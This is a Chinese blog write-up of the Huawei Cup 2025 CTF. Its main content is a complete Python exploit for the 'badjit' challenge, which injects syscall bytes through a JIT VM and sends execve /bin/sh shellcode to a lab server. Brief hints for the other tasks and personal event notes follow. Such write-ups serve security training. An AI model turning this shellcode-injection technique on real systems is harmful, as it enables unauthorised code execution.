华为杯-2025

华为杯-2025

InkeyP Lv3
  2025-12-02 11:49:08 2025-12-02 11:49:08 创建   2025-12-02 20:03:25 2025-12-02 20:03:25 更新      629 字  3 分钟  

华为杯 2025 WP

badjit

改rbx,call offset

先构造好寄存器,然后直接syscall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python3
from pwncli import *

# context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0', 'sp', '-s', '0.6', '-d', '.', 'wsl.exe', 'bash', '-c']
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './badjit')
if local_flag == "remote":
    addr = '192.168.18.29:10000'
    ip, port = re.split(r'[\s:]+', addr)
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()

cmd = '''
    brva 0x1ABF7
    ida
    c
    si
'''
launch_gdb(cmd)


class VM:
    def __init__(self):
        self.code = b""

    def add_reg(self, reg1, reg2):
        self.code += b'\x00' + p8(reg1) + p8(reg2)
        return self

    def sub_reg(self, reg1, reg2):
        self.code += b'\x01' + p8(reg1) + p8(reg2)
        return self

    def cmp_reg(self, reg1, reg2):
        self.code += b'\x03' + p8(reg1) + p8(reg2)
        return self

    def add_imm(self, reg, imm):
        self.code += b'\x80' + p8(reg) + p32(imm)
        return self

    def inj_code_add(self, reg, code):
        self.code += b'\x80' + p8(reg) + code
        return self

    def inj_code_sub(self, reg, code):
        self.code += b'\x81' + p8(reg) + code
        return self

    def get(self):
        return self.code


def addr_to_hex(addr_str):
    """
    输入格式: "172.18.11.18:11223"
    输出格式: "0x120b12acd72b0002"
    """
    try:
        ip, port = addr_str.strip().split(':')
        port = int(port)

        # 构造 sockaddr_in 结构体 (8字节)
        # 1. sa_family (2 bytes, AF_INET = 2)
        # 2. sin_port (2 bytes) - 网络字节序 (大端)
        # 3. sin_addr (4 bytes) - 网络字节序 (大端)

        # 组合字节流: Family(2) + Port + IP
        data = struct.pack('<H', 2) + struct.pack('!H', port) + socket.inet_aton(ip)

        # 将 8 字节数据解包为 64 位整数 (小端序,适配 x64 寄存器赋值)
        val = struct.unpack('<Q', data)[0]

        return f'0x{val:016x}'
    except Exception as e:
        print(f"转换错误: {e}")
        return None


vm = VM()
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.sub_reg(0, 0)
vm.sub_reg(4, 4)
vm.sub_reg(5, 5)
vm.add_reg(5, 1)
vm.sub_reg(3, 3)
vm.inj_code_add(3, b'\x90\x90\x0f\x05')
# vm.inj_code_add(0, b'\x53\x5e\x89\xd2')
# vm.inj_code(0, b'\x31\xff\x31\xc0')
# vm.add_imm(1, 0x4)
payload = vm.get()

# payload = b''
# for i in range(0x81, 0xFF):
#     payload += bytes.fromhex(f'{i:02x}01020304')

sla(b'length', str(len(payload)))
sa(b'input code', payload)

# pause()
s(b'\x90' * 0x10 + ShellcodeMall.amd64.execve_bin_sh)

ia()

kernel_note

index负数溢出

somenote

fix

把crc校验的jmp改反就能过,绷不住了

渗透

渗透在吃屎,源码叫bin.zip,真就复现exp

华为之夜

今年没有平板了,今年只有增智慧水壶

好吃的

去玩了

  • 标题: 华为杯-2025
  • 作者: InkeyP
  • 创建于 : 2025-12-02 11:49:08
  • 更新于 : 2025-12-02 20:03:25
  • 链接: https://blog.inkey.top/202512/02/华为杯-2025/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
绝赞文章
ciscn-2024 ciscn-2024 强网拟态-2025 强网拟态-2025 ciscn-2025-初赛 ciscn-2025-初赛
绝赞文章
ciscn-2024 ciscn-2024 强网拟态-2025 强网拟态-2025
评论
目录
华为杯-2025
  1. 华为杯 2025 WP
    1. badjit
    2. kernel_note
    3. somenote
      1. fix
    4. 渗透
    5. 华为之夜
    6. 好吃的
    7. 去玩了